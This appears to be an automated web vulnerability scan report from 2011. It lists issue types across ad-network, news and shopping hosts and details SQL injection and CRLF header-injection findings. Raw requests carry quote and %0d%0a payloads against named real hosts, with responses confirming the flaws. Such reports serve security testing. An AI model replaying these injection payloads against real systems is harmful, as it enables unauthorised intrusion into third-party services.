12.1. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3

12.2. http://ads.adbrite.com/adserver/vdi/742697

12.3. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

12.4. http://api.twitter.com/1/statuses/user_timeline.json

12.5. http://bandcamp.com/EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//

12.6. http://ib.adnxs.com/ttj

12.7. http://oads.mochila.com/openx/www/delivery/ajs.php

12.8. http://www.apture.com/js/apture.js

12.9. http://www.facebook.com/plugins/like.php

12.10. http://www.facebook.com/plugins/likebox.php

13. Cross-domain POST

13.1. http://asthmatickitty.com/

13.2. http://asthmatickitty.com/news.php

13.3. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif

13.4. http://www.nme.com/news/sufjan-stevens/56527

14. SSL cookie without secure flag set

14.1. https://www.ccnow.com/cgi-local/cart.cgi

14.2. https://www.ccnow.com/cgi-local/checkout.cgi

14.3. https://www.ccnow.com/cgi-local/sc_cart.cgi

15. Cross-domain Referer leakage

15.1. http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs

15.2. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784

15.3. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784.2

15.4. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26

15.5. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3

15.6. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

15.7. http://ad.yieldmanager.com/iframe3

15.8. http://ad.yieldmanager.com/iframe3

15.9. http://admeld.adnxs.com/usersync

15.10. http://ads.pointroll.com/PortalServe/

15.11. http://ads.revsci.net/adserver/ako

15.12. http://adserver.adtech.de/addyn%7C3.0%7C826.1%7C2874578%7C0%7C2530%7CADTECH

15.13. http://adserver.adtech.de/addyn%7C3.0%7C826.1%7C2874579%7C0%7C225%7CADTECH

15.14. http://cas.clickability.com/cas/cas.js

15.15. http://cas.clickability.com/cas/cas.js

15.16. http://cas.clickability.com/cas/cas.js

15.17. http://cas.clickability.com/cas/cas.js

15.18. http://cas.clickability.com/cas/cas.js

15.19. http://cas.clickability.com/cas/cas.js

15.20. http://choices.truste.com/ca

15.21. http://choices.truste.com/ca

15.22. http://cm.g.doubleclick.net/pixel

15.23. http://cm.g.doubleclick.net/pixel

15.24. http://gannett.gcion.com/addyn/3.0/5111.1/896067/0/-1/ADTECH

15.25. http://ib.adnxs.com/ab

15.26. http://ib.adnxs.com/if

15.27. http://ib.adnxs.com/if

15.28. http://ib.adnxs.com/ptj

15.29. http://imp.fetchback.com/serve/fb/imp

15.30. http://media.adfrontiers.com/pq

15.31. http://mediacdn.disqus.com/1304703476/build/system/disqus.js

15.32. http://mf.sitescout.com/disp

15.33. http://tag.contextweb.com/TagPublish/getad.aspx

15.34. http://www.ccnow.com/cgi-local/cart.cgi

15.35. http://www.ccnow.com/cgi-local/sc_cart.cgi

15.36. http://www.facebook.com/plugins/comments.php

15.37. http://www.facebook.com/plugins/like.php

15.38. http://www.facebook.com/plugins/likebox.php

15.39. http://www.facebook.com/plugins/likebox.php

15.40. http://www.google.com/trends/hottrends

15.41. http://www.google.com/trends/hottrends

15.42. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html

16. Cross-domain script include

16.1. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26

16.2. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3

16.3. http://ads.revsci.net/adserver/ako

16.4. http://asthmatickitty.com/

16.5. http://asthmatickitty.com/news.php

16.6. http://ib.adnxs.com/if

16.7. http://ib.adnxs.com/if

16.8. http://media.adfrontiers.com/pq

16.9. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

16.10. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif

16.11. http://tag.contextweb.com/TagPublish/getad.aspx

16.12. http://www.ccnow.com/cgi-local/cart.cgi

16.13. http://www.ccnow.com/cgi-local/sc_cart.cgi

16.14. https://www.ccnow.com/cgi-local/cart.cgi

16.15. https://www.ccnow.com/cgi-local/checkout.cgi

16.16. https://www.ccnow.com/cgi-local/sc_cart.cgi

16.17. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

16.18. http://www.clashmusic.com/user/a

16.19. http://www.clashmusic.com/user/password

16.20. http://www.clashmusic.com/user/register

16.21. http://www.facebook.com/plugins/comments.php

16.22. http://www.facebook.com/plugins/like.php

16.23. http://www.facebook.com/plugins/likebox.php

16.24. http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

16.25. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html

16.26. http://www.nme.com/news/sufjan-stevens/56527

16.27. http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story

16.28. http://www.orlandosentinel.com/business/transparent

16.29. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html

16.30. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

17. File upload functionality

18. TRACE method is enabled

18.1. http://alvenda.122.2o7.net/

18.2. http://ie-stat.bmmetrix.com/

18.3. http://imp.fetchback.com/

18.4. http://ipcmedia.122.2o7.net/

18.5. http://optimized-by.rubiconproject.com/

18.6. http://secure-au.imrworldwide.com/

19. Email addresses disclosed

19.1. http://ads.adbrite.com/adserver/vdi/742697

19.2. http://asthmatickitty.com/

19.3. http://asthmatickitty.com/news.php

19.4. http://cdn11.surphace.com/javascript/omniture_h15.js

19.5. http://mediacdn.disqus.com/1304703476/build/system/disqus.js

19.6. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js

19.7. http://w.sharethis.com/button/buttons.js

19.8. http://widgets.twimg.com/j/2/widget.css

19.9. http://widgets.twimg.com/j/2/widget.js

19.10. http://www.clashmusic.com/sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.css

19.11. http://www.clashmusic.com/sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.js

19.12. http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages

19.13. http://www.floridatoday.com/odygel/lib/legacy/GDN/GDNpreload.js

19.14. http://www.floridatoday.com/odygel/lib/userauth/validateform.js

19.15. http://www.indianasnewscenter.com/includes/granite_js_lib.js

19.16. http://www.irishtimes.com/js/s_code.js

19.17. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html

19.18. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

20. Private IP addresses disclosed

20.1. http://api.facebook.com/restserver.php

20.2. http://connect.facebook.net/en_GB/all.js

20.3. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

20.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

20.5. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/uBEmPS-MH2t.js

20.6. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png

20.7. http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/qWIGt6WPRA1.js

20.8. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/dMZead4v66-.js

20.9. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/RxZwFAf4oY9.js

20.10. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png

20.11. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

20.12. http://www.facebook.com/extern/login_status.php

20.13. http://www.facebook.com/extern/login_status.php

20.14. http://www.facebook.com/extern/login_status.php

20.15. http://www.facebook.com/extern/login_status.php

20.16. http://www.facebook.com/extern/login_status.php

20.17. http://www.facebook.com/plugins/comments.php

20.18. http://www.facebook.com/plugins/comments.php

20.19. http://www.facebook.com/plugins/like.php

20.20. http://www.facebook.com/plugins/like.php

20.21. http://www.facebook.com/plugins/like.php

20.22. http://www.facebook.com/plugins/like.php

20.23. http://www.facebook.com/plugins/like.php

20.24. http://www.facebook.com/plugins/like.php

20.25. http://www.facebook.com/plugins/like.php

20.26. http://www.facebook.com/plugins/like.php

20.27. http://www.facebook.com/plugins/like.php

20.28. http://www.facebook.com/plugins/like.php

20.29. http://www.facebook.com/plugins/like.php

20.30. http://www.facebook.com/plugins/like.php

20.31. http://www.facebook.com/plugins/like.php

20.32. http://www.facebook.com/plugins/like.php

20.33. http://www.facebook.com/plugins/like.php

20.34. http://www.facebook.com/plugins/like.php

20.35. http://www.facebook.com/plugins/like.php

20.36. http://www.facebook.com/plugins/like.php

20.37. http://www.facebook.com/plugins/like.php

20.38. http://www.facebook.com/plugins/like.php

20.39. http://www.facebook.com/plugins/like.php

20.40. http://www.facebook.com/plugins/like.php

20.41. http://www.facebook.com/plugins/like.php

20.42. http://www.facebook.com/plugins/like.php

20.43. http://www.facebook.com/plugins/like.php

20.44. http://www.facebook.com/plugins/like.php

20.45. http://www.facebook.com/plugins/like.php

20.46. http://www.facebook.com/plugins/like.php

20.47. http://www.facebook.com/plugins/likebox.php

20.48. http://www.facebook.com/plugins/likebox.php

21. Credit card numbers disclosed

22. Robots.txt file

22.1. http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs

22.2. http://ad.au.doubleclick.net/ad/N799.WhistleOut/B5381461.80

22.3. http://adserver.adtech.de/addyn%7C3.0%7C656%7C1497495%7C0%7C170%7CADTECH

22.4. http://adserverams.adtech.de/adperf%7C2.0%7C577%7C2951881%7C0%7C1%7CAdId=5763683

22.5. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

22.6. http://cspix.media6degrees.com/orbserv/hbpix

22.7. http://edge.viagogo.co.uk/feeds/widget.ashx

22.8. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

22.9. http://ie-stat.bmmetrix.com/V13a

22.10. http://imp.fetchback.com/serve/fb/adtag.js

22.11. http://ipcmedia.122.2o7.net/b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795

22.12. http://irishtimesgroup.112.2o7.net/b/ss/itgirishtimesprod/1/H.15.1/s81982920831069

22.13. http://l.addthiscdn.com/live/t00/250lo.gif

22.14. http://l.alvenda.net/e

22.15. http://p.addthis.com/pixel

22.16. http://s0.2mdn.net/dot.gif

22.17. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif

22.18. http://toolbarqueries.clients.google.com/tbproxy/af/query

22.19. http://va.px.invitemedia.com/pixel

22.20. http://west.thomson.com/VendorFeeds/Alvendify/AlvendaImpression.aspx

22.21. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

23. Cacheable HTTPS response

23.1. https://www.ccnow.com/cgi-local/cart.cgi

23.2. https://www.ccnow.com/cgi-local/checkout.cgi

23.3. https://www.ccnow.com/cgi-local/sc_cart.cgi

23.4. https://www.ccnow.com/favicon.ico

24. HTML does not specify charset

24.1. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784

24.2. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784.2

24.3. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26

24.4. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday

24.5. http://ad.yieldmanager.com/iframe3

24.6. http://ads.pointroll.com/PortalServe/

24.7. http://asthmatickitty.com/

24.8. http://asthmatickitty.com/news.php

24.9. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/

24.10. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/

24.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.12. http://cdn.apture.com/media/html/aptureLoadIframe.html

24.13. http://content.pulse360.com/cgi-bin/context.cgi

24.14. http://cookie.alvenda.com/v2_1/code/ExtractCookie.html

24.15. http://dx.nme.com/ifrm.html

24.16. http://media.adfrontiers.com/pq

24.17. http://mediacdn.disqus.com/1304703476/build/system/def.html

24.18. http://mediacdn.disqus.com/1304703476/build/system/reply.html

24.19. http://mediacdn.disqus.com/1304703476/build/system/upload.html

24.20. http://ping.chartbeat.net/ping

24.21. http://pixel.invitemedia.com/data_sync

24.22. http://uac.advertising.com/wrapper/aceUACping.htm

24.23. http://wd.sharethis.com/api/getCount2.php

24.24. http://widgets.surphace.com/partner/omniture/sphereomni_api.php

24.25. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

24.26. http://www.ccnow.com/cgi-local/cart.cgi

24.27. https://www.ccnow.com/cgi-local/cart.cgi

24.28. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

24.29. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

24.30. http://www.nme.com/hotspot/channel/news

24.31. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html

24.32. http://www.sufjan.com/

24.33. http://www.surphace.com/ads/rubicon_orlandosentinel

25. Content type incorrectly stated

25.1. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday

25.2. http://ads.pointroll.com/PortalServe/

25.3. http://ar.voicefive.com/b/rc.pli

25.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.5. http://cdn.apture.com/media/searchfilter.khtml.v30596971.js

25.6. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js

25.7. http://content.pulse360.com/cgi-bin/context.cgi

25.8. http://event.adxpose.com/event.flow

25.9. http://imp.fetchback.com/serve/fb/adtag.js

25.10. http://l.apture.com/v3/

25.11. http://mediacdn.disqus.com/1304703476/fonts/disqus-webfont.woff

25.12. http://mediaforce.sitescout.netdna-cdn.com/ad150-c157549.jpg

25.13. http://pglb.buzzfed.com/124044/2cda0cc53888bd4bde08b06faa4b2d81

25.14. http://wd.sharethis.com/api/getCount2.php

25.15. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

25.16. http://www.ccnow.com/cgi-local/cart.cgi

25.17. http://www.ccnow.com/favicon.ico

25.18. http://www.ccnow.com/images/cart/ccnowcart_gray.jpg

25.19. https://www.ccnow.com/cgi-local/cart.cgi

25.20. https://www.ccnow.com/favicon.ico

25.21. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico

25.22. http://www.facebook.com/extern/login_status.php

25.23. http://www.floridatoday.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

25.24. http://www.nme.com/favicon.ico

26. Content type is not specified

26.1. http://ad.yieldmanager.com/st

26.2. http://pcm1.map.pulsemgr.com/uds/pc

26.3. http://www.meebo.com/cmd/tc

27. SSL certificate


1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://l.alvenda.net/e [e parameter]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://l.alvenda.net
Path:   /e

Issue detail

The e parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the e parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /e?s=12869239901192486&e=impression'&so=js-placement&c=5lnsx9b4&ty=b&m=RubiconRemarketing_ThomsonReuters HTTP/1.1
Host: l.alvenda.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 ERROR: unterminated quoted string at or near "'IMPRESSION'' ) " Position: 181
Date: Mon, 09 May 2011 14:06:48 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1506
Server: Jetty(6.1.22)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 ERROR: unterminated quoted string at or near "'IMPRESSION'' ) "
Position: 181</title>
</head>
...[SNIP]...
1.2. http://l.alvenda.net/e [so parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://l.alvenda.net
Path:   /e

Issue detail

The so parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the so parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /e?s=12869239901192486&e=impression&so=js-placement'&c=5lnsx9b4&ty=b&m=RubiconRemarketing_ThomsonReuters HTTP/1.1
Host: l.alvenda.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 ERROR: unterminated quoted string at or near "'JS-PLACEMENT'' ) " Position: 188
Date: Mon, 09 May 2011 14:06:48 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1510
Server: Jetty(6.1.22)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 ERROR: unterminated quoted string at or near "'JS-PLACEMENT'' ) "
Position: 188</title>
</hea
...[SNIP]...
1.3. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /music/blogs'/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 14:06:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3026

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /music/blogs''/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 269581


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
2. HTTP header injection  previous  next
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.burst/B5229711.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 334dd%0d%0a6d942ec9952 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /334dd%0d%0a6d942ec9952/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/334dd
6d942ec9952/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http: //www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656
Date: Mon, 09 May 2011 14:03:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
2.2. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_brevard_cim/floridatoday

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 48d26%0d%0a5aaccec468c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/gannett_brevard_cim/floridatoday;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;ord=1304949640480?&48d26%0d%0a5aaccec468c=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;241011702;0-0;5;60840454;24/24;42008809/42026596/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;;48d26
5aaccec468c=1;~cs=i:
Date: Mon, 09 May 2011 14:01:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1011

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;241011702;0-0;5;60840454;24/24;42008809/42026596/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;i
...[SNIP]...
2.3. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday [secure parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_brevard_cim/floridatoday

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload c5c12%0d%0a7e45a7ac1ac was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/gannett_brevard_cim/floridatoday;secure=c5c12%0d%0a7e45a7ac1ac HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
